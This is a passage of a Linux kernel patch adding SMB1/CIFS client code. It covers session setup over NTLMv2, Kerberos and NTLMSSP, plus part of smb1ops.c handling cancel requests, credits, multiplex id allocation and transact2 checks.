++	return 0;
++
++out_free_smb_buf:
++	cifs_small_buf_release(smb_buf);
++	sess_data->iov[0].iov_base = NULL;
++	sess_data->iov[0].iov_len = 0;
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	return rc;
++}
++
++static void
++sess_free_buffer(struct sess_data *sess_data)
++{
++	struct kvec *iov = sess_data->iov;
++
++	/*
++	 * Zero the session data before freeing, as it might contain sensitive info (keys, etc).
++	 * Note that iov[1] is already freed by caller.
++	 */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
++		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
++
++	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	kfree_sensitive(iov[2].iov_base);
++}
++
++static int
++sess_establish_session(struct sess_data *sess_data)
++{
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	cifs_server_lock(server);
++	if (!server->session_estab) {
++		if (server->sign) {
++			server->session_key.response =
++				kmemdup(ses->auth_key.response,
++				ses->auth_key.len, GFP_KERNEL);
++			if (!server->session_key.response) {
++				cifs_server_unlock(server);
++				return -ENOMEM;
++			}
++			server->session_key.len =
++						ses->auth_key.len;
++		}
++		server->sequence_number = 0x2;
++		server->session_estab = true;
++	}
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "CIFS session established successfully\n");
++	return 0;
++}
++
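++/*
++ * Finalize the byte count from iov[1] and iov[2], send all three
++ * iovecs to the server and replace iov[0] with the response buffer on
++ * return.
++ */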
++static int
++sess_sendreceive(struct sess_data *sess_data)
++{
++	int rc;
++	struct smb_hdr *smb_buf = (struct smb_hdr *) sess_data->iov[0].iov_base;
++	__u16 count;
++	struct kvec rsp_iov = { NULL, 0 };
++
++	count = sess_data->iov[1].iov_len + sess_data->iov[2].iov_len;
++	be32_add_cpu(&smb_buf->smb_buf_length, count);
++	put_bcc(count, smb_buf);
++
++	rc = SendReceive2(sess_data->xid, sess_data->ses,
++			  sess_data->iov, 3 /* num_iovecs */,
++			  &sess_data->buf0_type,
++			  CIFS_LOG_ERROR, &rsp_iov);
++	cifs_small_buf_release(sess_data->iov[0].iov_base);
++	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
++
++	return rc;
++}
++
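++/*
++ * Old-style (non-extended-security) session setup, placing an NTLMv2
++ * response directly in the request rather than inside an NTLMSSP or
++ * SPNEGO blob.
++ */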
++static void
++sess_auth_ntlmv2(struct sess_data *sess_data)
++{
++	int rc = 0;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	char *bcc_ptr;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u32 capabilities;
++	__u16 bytes_remaining;
++
++	/* old style NTLM sessionsetup */
++	/* wct = 13 */
++	rc = sess_alloc_buffer(sess_data, 13);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	bcc_ptr = sess_data->iov[2].iov_base;
++	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
++
++	pSMB->req_no_secext.Capabilities = cpu_to_le32(capabilities);
++
++	/* LM2 password would be here if we supported it */
++	pSMB->req_no_secext.CaseInsensitivePasswordLength = 0;
++
++	if (ses->user_name != NULL) {
++		/* calculate nlmv2 response and session key */
++		rc = setup_ntlmv2_rsp(ses, sess_data->nls_cp);
++		if (rc) {
++			cifs_dbg(VFS, "Error %d during NTLMv2 authentication\n", rc);
++			goto out;
++		}
++
++		memcpy(bcc_ptr, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
++				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++		bcc_ptr += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
++
++		/* set the case-sensitive password length after tilen may
++		 * have been assigned; tilen is 0 otherwise.
++		 */
++		pSMB->req_no_secext.CaseSensitivePasswordLength =
++			cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++	} else {
++		pSMB->req_no_secext.CaseSensitivePasswordLength = 0;
++	}
++
++	if (ses->capabilities & CAP_UNICODE) {
++		if (!IS_ALIGNED(sess_data->iov[0].iov_len, 2)) {
++			*bcc_ptr = 0;
++			bcc_ptr++;
++		}
++		unicode_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
++	} else {
++		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
++	}
++
++	sess_data->iov[2].iov_len = (long) bcc_ptr -
++			(long) sess_data->iov[2].iov_base;
++
++	rc = sess_sendreceive(sess_data);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++
++	if (smb_buf->WordCount != 3) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out;
++	}
++
++	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
++		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
++
++	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
++	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++
++	/* BB check if Unicode and decode strings */
++	if (bytes_remaining == 0) {
++		/* no string area to decode, do nothing */
++	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
++		/* unicode string area must be word-aligned */
++		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
++			++bcc_ptr;
++			--bytes_remaining;
++		}
++		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
++				      sess_data->nls_cp);
++	} else {
++		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
++				    sess_data->nls_cp);
++	}
++
++	rc = sess_establish_session(sess_data);
++out:
++	sess_data->result = rc;
++	sess_data->func = NULL;
++	sess_free_buffer(sess_data);
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++}
++
++#ifdef CONFIG_CIFS_UPCALL
++static void
++sess_auth_kerberos(struct sess_data *sess_data)
++{
++	int rc = 0;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	char *bcc_ptr;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u32 capabilities;
++	__u16 bytes_remaining;
++	struct key *spnego_key = NULL;
++	struct cifs_spnego_msg *msg;
++	u16 blob_len;
++
++	/* extended security */
++	/* wct = 12 */
++	rc = sess_alloc_buffer(sess_data, 12);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	bcc_ptr = sess_data->iov[2].iov_base;
++	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
++
++	spnego_key = cifs_get_spnego_key(ses, server);
++	if (IS_ERR(spnego_key)) {
++		rc = PTR_ERR(spnego_key);
++		spnego_key = NULL;
++		goto out;
++	}
++
++	msg = spnego_key->payload.data[0];
++	/*
++	 * check version field to make sure that cifs.upcall is
++	 * sending us a response in an expected form
++	 */
++	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
++		cifs_dbg(VFS, "incorrect version of cifs.upcall (expected %d but got %d)\n",
++			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
++		rc = -EKEYREJECTED;
++		goto out_put_spnego_key;
++	}
++
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
++					 GFP_KERNEL);
++	if (!ses->auth_key.response) {
++		cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
++			 msg->sesskey_len);
++		rc = -ENOMEM;
++		goto out_put_spnego_key;
++	}
++	ses->auth_key.len = msg->sesskey_len;
++
++	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
++	capabilities |= CAP_EXTENDED_SECURITY;
++	pSMB->req.Capabilities = cpu_to_le32(capabilities);
++	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
++	sess_data->iov[1].iov_len = msg->secblob_len;
++	pSMB->req.SecurityBlobLength = cpu_to_le16(sess_data->iov[1].iov_len);
++
++	if (ses->capabilities & CAP_UNICODE) {
++		/* unicode strings must be word aligned */
++		if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
++			*bcc_ptr = 0;
++			bcc_ptr++;
++		}
++		unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
++		unicode_domain_string(&bcc_ptr, ses, sess_data->nls_cp);
++	} else {
++		/* BB: is this right? */
++		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
++	}
++
++	sess_data->iov[2].iov_len = (long) bcc_ptr -
++			(long) sess_data->iov[2].iov_base;
++
++	rc = sess_sendreceive(sess_data);
++	if (rc)
++		goto out_put_spnego_key;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++
++	if (smb_buf->WordCount != 4) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out_put_spnego_key;
++	}
++
++	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
++		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
++
++	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
++	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++
++	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
++	if (blob_len > bytes_remaining) {
++		cifs_dbg(VFS, "bad security blob length %d\n",
++				blob_len);
++		rc = -EINVAL;
++		goto out_put_spnego_key;
++	}
++	bcc_ptr += blob_len;
++	bytes_remaining -= blob_len;
++
++	/* BB check if Unicode and decode strings */
++	if (bytes_remaining == 0) {
++		/* no string area to decode, do nothing */
++	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
++		/* unicode string area must be word-aligned */
++		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
++			++bcc_ptr;
++			--bytes_remaining;
++		}
++		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
++				      sess_data->nls_cp);
++	} else {
++		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
++				    sess_data->nls_cp);
++	}
++
++	rc = sess_establish_session(sess_data);
++out_put_spnego_key:
++	key_invalidate(spnego_key);
++	key_put(spnego_key);
++out:
++	sess_data->result = rc;
++	sess_data->func = NULL;
++	sess_free_buffer(sess_data);
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++}
++
++#endif /* CONFIG_CIFS_UPCALL */
++
++/*
++ * The required kvec buffers have to be allocated before calling this
++ * function.
++ */
++static int
++_sess_auth_rawntlmssp_assemble_req(struct sess_data *sess_data)
++{
++	SESSION_SETUP_ANDX *pSMB;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u32 capabilities;
++	char *bcc_ptr;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++
++	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
++	if ((pSMB->req.hdr.Flags2 & SMBFLG2_UNICODE) == 0) {
++		cifs_dbg(VFS, "NTLMSSP requires Unicode support\n");
++		return -ENOSYS;
++	}
++
++	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
++	capabilities |= CAP_EXTENDED_SECURITY;
++	pSMB->req.Capabilities |= cpu_to_le32(capabilities);
++
++	bcc_ptr = sess_data->iov[2].iov_base;
++	/* unicode strings must be word aligned */
++	if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
++		*bcc_ptr = 0;
++		bcc_ptr++;
++	}
++	unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
++
++	sess_data->iov[2].iov_len = (long) bcc_ptr -
++					(long) sess_data->iov[2].iov_base;
++
++	return 0;
++}
++
++static void
++sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data);
++
++static void
++sess_auth_rawntlmssp_negotiate(struct sess_data *sess_data)
++{
++	int rc;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u16 bytes_remaining;
++	char *bcc_ptr;
++	unsigned char *ntlmsspblob = NULL;
++	u16 blob_len;
++
++	cifs_dbg(FYI, "rawntlmssp session setup negotiate phase\n");
++
++	/*
++	 * If the memory allocation is successful, the caller of this
++	 * function is responsible for freeing it.
++	 */
++	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
++	if (!ses->ntlmssp) {
++		rc = -ENOMEM;
++		goto out;
++	}
++	ses->ntlmssp->sesskey_per_smbsess = false;
++
++	/* wct = 12 */
++	rc = sess_alloc_buffer(sess_data, 12);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++
++	/* Build security blob before we assemble the request */
++	rc = build_ntlmssp_negotiate_blob(&ntlmsspblob,
++				     &blob_len, ses, server,
++				     sess_data->nls_cp);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	sess_data->iov[1].iov_len = blob_len;
++	sess_data->iov[1].iov_base = ntlmsspblob;
++	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
++
++	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	rc = sess_sendreceive(sess_data);
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++
++	/* If true, rc here is expected and not an error */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
++	    smb_buf->Status.CifsError ==
++			cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))
++		rc = 0;
++
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
++
++	if (smb_buf->WordCount != 4) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out_free_ntlmsspblob;
++	}
++
++	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
++	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++
++	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
++	if (blob_len > bytes_remaining) {
++		cifs_dbg(VFS, "bad security blob length %d\n",
++				blob_len);
++		rc = -EINVAL;
++		goto out_free_ntlmsspblob;
++	}
++
++	rc = decode_ntlmssp_challenge(bcc_ptr, blob_len, ses);
++
++out_free_ntlmsspblob:
++	kfree_sensitive(ntlmsspblob);
++out:
++	sess_free_buffer(sess_data);
++
++	if (!rc) {
++		sess_data->func = sess_auth_rawntlmssp_authenticate;
++		return;
++	}
++
++	/* Else error. Cleanup */
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++
++	sess_data->func = NULL;
++	sess_data->result = rc;
++}
++
++static void
++sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data)
++{
++	int rc;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u16 bytes_remaining;
++	char *bcc_ptr;
++	unsigned char *ntlmsspblob = NULL;
++	u16 blob_len;
++
++	cifs_dbg(FYI, "rawntlmssp session setup authenticate phase\n");
++
++	/* wct = 12 */
++	rc = sess_alloc_buffer(sess_data, 12);
++	if (rc)
++		goto out;
++
++	/* Build security blob before we assemble the request */
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)pSMB;
++	rc = build_ntlmssp_auth_blob(&ntlmsspblob,
++					&blob_len, ses, server,
++					sess_data->nls_cp);
++	if (rc)
++		goto out_free_ntlmsspblob;
++	sess_data->iov[1].iov_len = blob_len;
++	sess_data->iov[1].iov_base = ntlmsspblob;
++	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
++	/*
++	 * Make sure that we tell the server that we are using
++	 * the uid that it just gave us back on the response
++	 * (challenge)
++	 */
++	smb_buf->Uid = ses->Suid;
++
++	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	rc = sess_sendreceive(sess_data);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++	if (smb_buf->WordCount != 4) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out_free_ntlmsspblob;
++	}
++
++	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
++		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
++
++	if (ses->Suid != smb_buf->Uid) {
++		ses->Suid = smb_buf->Uid;
++		cifs_dbg(FYI, "UID changed! new UID = %llu\n", ses->Suid);
++	}
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
++	if (blob_len > bytes_remaining) {
++		cifs_dbg(VFS, "bad security blob length %d\n",
++				blob_len);
++		rc = -EINVAL;
++		goto out_free_ntlmsspblob;
++	}
++	bcc_ptr += blob_len;
++	bytes_remaining -= blob_len;
++
++	/* BB check if Unicode and decode strings */
++	if (bytes_remaining == 0) {
++		/* no string area to decode, do nothing */
++	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
++		/* unicode string area must be word-aligned */
++		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
++			++bcc_ptr;
++			--bytes_remaining;
++		}
++		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
++				      sess_data->nls_cp);
++	} else {
++		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
++				    sess_data->nls_cp);
++	}
++
++out_free_ntlmsspblob:
++	kfree_sensitive(ntlmsspblob);
++out:
++	sess_free_buffer(sess_data);
++
++	if (!rc)
++		rc = sess_establish_session(sess_data);
++
++	/* Cleanup */
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++
++	sess_data->func = NULL;
++	sess_data->result = rc;
++}
++
++static int select_sec(struct sess_data *sess_data)
++{
++	int type;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	type = cifs_select_sectype(server, ses->sectype);
++	cifs_dbg(FYI, "sess setup type %d\n", type);
++	if (type == Unspecified) {
++		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
++		return -EINVAL;
++	}
++
++	switch (type) {
++	case NTLMv2:
++		sess_data->func = sess_auth_ntlmv2;
++		break;
++	case Kerberos:
++#ifdef CONFIG_CIFS_UPCALL
++		sess_data->func = sess_auth_kerberos;
++		break;
++#else
++		cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
++		return -ENOSYS;
++#endif /* CONFIG_CIFS_UPCALL */
++	case RawNTLMSSP:
++		sess_data->func = sess_auth_rawntlmssp_negotiate;
++		break;
++	default:
++		cifs_dbg(VFS, "secType %d not supported!\n", type);
++		return -ENOSYS;
++	}
++
++	return 0;
++}
++
++int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
++		   struct TCP_Server_Info *server,
++		   const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	struct sess_data *sess_data;
++
++	if (ses == NULL) {
++		WARN(1, "%s: ses == NULL!", __func__);
++		return -EINVAL;
++	}
++
++	sess_data = kzalloc(sizeof(struct sess_data), GFP_KERNEL);
++	if (!sess_data)
++		return -ENOMEM;
++
++	sess_data->xid = xid;
++	sess_data->ses = ses;
++	sess_data->server = server;
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	sess_data->nls_cp = (struct nls_table *) nls_cp;
++
++	rc = select_sec(sess_data);
++	if (rc)
++		goto out;
++
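++	/*
++	 * Simple state machine: each handler below performs one round trip
++	 * and either sets sess_data->func to the next phase (the rawntlmssp
++	 * negotiate handler chains to the authenticate handler this way) or
++	 * clears it to terminate, leaving the outcome in sess_data->result.
++	 */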
++	while (sess_data->func)
++		sess_data->func(sess_data);
++
++	/* Store result before we free sess_data */
++	rc = sess_data->result;
++
++out:
++	kfree_sensitive(sess_data);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+diff --git a/fs/smb/client/smb1ops.c b/fs/smb/client/smb1ops.c
+new file mode 100644
+index 0000000000000..7d1b3fc014d94
+--- /dev/null
++++ b/fs/smb/client/smb1ops.c
+@@ -0,0 +1,1276 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ *  SMB1 (CIFS) version specific operations
++ *
++ *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
++ */
++
++#include <linux/pagemap.h>
++#include <linux/vfs.h>
++#include <uapi/linux/magic.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifspdu.h"
++#include "cifs_unicode.h"
++#include "fs_context.h"
++
++/*
++ * An NT cancel request header looks just like the original request except:
++ *
++ * The Command is SMB_COM_NT_CANCEL
++ * The WordCount is zeroed out
++ * The ByteCount is zeroed out
++ *
++ * This function mangles an existing request buffer into a
++ * SMB_COM_NT_CANCEL request and then sends it.
++ */
++static int
++send_nt_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
++	       struct mid_q_entry *mid)
++{
++	int rc = 0;
++	struct smb_hdr *in_buf = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++
++	/* -4 for RFC1001 length and +2 for BCC field */
++	in_buf->smb_buf_length = cpu_to_be32(sizeof(struct smb_hdr) - 4  + 2);
++	in_buf->Command = SMB_COM_NT_CANCEL;
++	in_buf->WordCount = 0;
++	put_bcc(0, in_buf);
++
++	cifs_server_lock(server);
++	rc = cifs_sign_smb(in_buf, server, &mid->sequence_number);
++	if (rc) {
++		cifs_server_unlock(server);
++		return rc;
++	}
++
++	/*
++	 * The response to this call was already factored into the sequence
++	 * number when the call went out, so we must adjust it back downward
++	 * after signing here.
++	 */
++	--server->sequence_number;
++	rc = smb_send(server, in_buf, be32_to_cpu(in_buf->smb_buf_length));
++	if (rc < 0)
++		server->sequence_number--;
++
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "issued NT_CANCEL for mid %u, rc = %d\n",
++		 get_mid(in_buf), rc);
++
++	return rc;
++}
++
++static bool
++cifs_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
++{
++	return ob1->fid.netfid == ob2->fid.netfid;
++}
++
++static unsigned int
++cifs_read_data_offset(char *buf)
++{
++	READ_RSP *rsp = (READ_RSP *)buf;
++	return le16_to_cpu(rsp->DataOffset);
++}
++
++static unsigned int
++cifs_read_data_length(char *buf, bool in_remaining)
++{
++	READ_RSP *rsp = (READ_RSP *)buf;
++	/* Reading remaining data for SMB1 packets would be a bug */
++	WARN_ON(in_remaining);
++	return (le16_to_cpu(rsp->DataLengthHigh) << 16) +
++	       le16_to_cpu(rsp->DataLength);
++}
++
++static struct mid_q_entry *
++cifs_find_mid(struct TCP_Server_Info *server, char *buffer)
++{
++	struct smb_hdr *buf = (struct smb_hdr *)buffer;
++	struct mid_q_entry *mid;
++
++	spin_lock(&server->mid_lock);
++	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
++		if (compare_mid(mid->mid, buf) &&
++		    mid->mid_state == MID_REQUEST_SUBMITTED &&
++		    le16_to_cpu(mid->command) == buf->Command) {
++			kref_get(&mid->refcount);
++			spin_unlock(&server->mid_lock);
++			return mid;
++		}
++	}
++	spin_unlock(&server->mid_lock);
++	return NULL;
++}
++
++static void
++cifs_add_credits(struct TCP_Server_Info *server,
++		 const struct cifs_credits *credits, const int optype)
++{
++	spin_lock(&server->req_lock);
++	server->credits += credits->value;
++	server->in_flight--;
++	spin_unlock(&server->req_lock);
++	wake_up(&server->request_q);
++}
++
++static void
++cifs_set_credits(struct TCP_Server_Info *server, const int val)
++{
++	spin_lock(&server->req_lock);
++	server->credits = val;
++	server->oplocks = val > 1 ? enable_oplocks : false;
++	spin_unlock(&server->req_lock);
++}
++
++static int *
++cifs_get_credits_field(struct TCP_Server_Info *server, const int optype)
++{
++	return &server->credits;
++}
++
++static unsigned int
++cifs_get_credits(struct mid_q_entry *mid)
++{
++	return 1;
++}
++
++/*
++ * Find a free multiplex id (SMB mid). Without this check there could
++ * be mid collisions, which might cause the wrong response to be
++ * demultiplexed to this request. Multiplex ids could collide if
++ * one of a series of requests takes much longer than the others, or
++ * if a very large number of long lived requests (byte range
++ * locks or FindNotify requests) are pending. No more than
++ * 64K-1 requests can be outstanding at one time. If no
++ * mids are available, return zero. A future optimization
++ * could make the combination of mids and uid the key we use
++ * to demultiplex on (rather than mid alone).
++ * In addition to the above check, the cifs demultiplex
++ * code already uses the command code as a secondary
++ * check of the frame and if signing is negotiated the
++ * response would be discarded if the mid were the same
++ * but the signature was wrong. Since the mid is not put in the
++ * pending queue until later (when it is about to be dispatched)
++ * we do have to limit the number of outstanding requests
++ * to somewhat less than 64K-1 although it is hard to imagine
++ * so many threads being in the vfs at one time.
++ */
++static __u64
++cifs_get_next_mid(struct TCP_Server_Info *server)
++{
++	__u64 mid = 0;
++	__u16 last_mid, cur_mid;
++	bool collision, reconnect = false;
++
++	spin_lock(&server->mid_lock);
++
++	/* mid is 16 bit only for CIFS/SMB */
++	cur_mid = (__u16)((server->CurrentMid) & 0xffff);
++	/* we do not want to loop forever */
++	last_mid = cur_mid;
++	cur_mid++;
++	/* avoid 0xFFFF MID */
++	if (cur_mid == 0xffff)
++		cur_mid++;
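++	/*
++	 * Worked example of the wrap-around: if CurrentMid was 0xFFFE,
++	 * cur_mid becomes the reserved 0xFFFF, the 16-bit increment above
++	 * wraps it to 0, and the check at the top of the loop below skips
++	 * the reserved mid 0, so the search resumes from 1.
++	 */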
++
++	/*
++	 * This nested loop looks more expensive than it is.
++	 * In practice the list of pending requests is short,
++	 * fewer than 50, and the mids are likely to be unique
++	 * on the first pass through the loop unless some request
++	 * takes longer than the 64 thousand requests before it
++	 * (and it would also have to have been a request that
++	 * did not time out).
++	 */
++	while (cur_mid != last_mid) {
++		struct mid_q_entry *mid_entry;
++		unsigned int num_mids;
++
++		collision = false;
++		if (cur_mid == 0)
++			cur_mid++;
++
++		num_mids = 0;
++		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
++			++num_mids;
++			if (mid_entry->mid == cur_mid &&
++			    mid_entry->mid_state == MID_REQUEST_SUBMITTED) {
++				/* This mid is in use, try a different one */
++				collision = true;
++				break;
++			}
++		}
++
++		/*
++		 * if we have more than 32k mids in the list, then something
++		 * is very wrong. Possibly a local user is trying to DoS the
++		 * box by issuing long-running calls and SIGKILL'ing them. If
++		 * we get to 2^16 mids then we're in big trouble as this
++		 * function could loop forever.
++		 *
++		 * Go ahead and assign out the mid in this situation, but force
++		 * an eventual reconnect to clean out the pending_mid_q.
++		 */
++		if (num_mids > 32768)
++			reconnect = true;
++
++		if (!collision) {
++			mid = (__u64)cur_mid;
++			server->CurrentMid = mid;
++			break;
++		}
++		cur_mid++;
++	}
++	spin_unlock(&server->mid_lock);
++
++	if (reconnect) {
++		cifs_signal_cifsd_for_reconnect(server, false);
++	}
++
++	return mid;
++}
++
++/*
++	return codes:
++		0	not a transact2, or all data present
++		>0	transact2 with that much data missing
++		-EINVAL	invalid transact2
++ */
++static int
++check2ndT2(char *buf)
++{
++	struct smb_hdr *pSMB = (struct smb_hdr *)buf;
++	struct smb_t2_rsp *pSMBt;
++	int remaining;
++	__u16 total_data_size, data_in_this_rsp;
++
++	if (pSMB->Command != SMB_COM_TRANSACTION2)
++		return 0;
++
++	/* check for plausible wct, bcc and t2 data and parm sizes */
++	/* check for parm and data offset going beyond end of smb */
++	if (pSMB->WordCount != 10) { /* coalesce_t2 depends on this */
++		cifs_dbg(FYI, "Invalid transact2 word count\n");
++		return -EINVAL;
++	}
++
++	pSMBt = (struct smb_t2_rsp *)pSMB;
++
++	total_data_size = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
++	data_in_this_rsp = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
++
++	if (total_data_size == data_in_this_rsp)
++		return 0;
++	else if (total_data_size < data_in_this_rsp) {
++		cifs_dbg(FYI, "total data %d smaller than data in frame %d\n",
++			 total_data_size, data_in_this_rsp);
++		return -EINVAL;
++	}
++
++	remaining = total_data_size - data_in_this_rsp;
++
++	cifs_dbg(FYI, "missing %d bytes from transact2, check next response\n",
++		 remaining);
++	if (total_data_size > CIFSMaxBufSize) {
++		cifs_dbg(VFS, "TotalDataSize %d is over maximum buffer %d\n",
++			 total_data_size, CIFSMaxBufSize);
++		return -EINVAL;
++	}
++	return remaining;
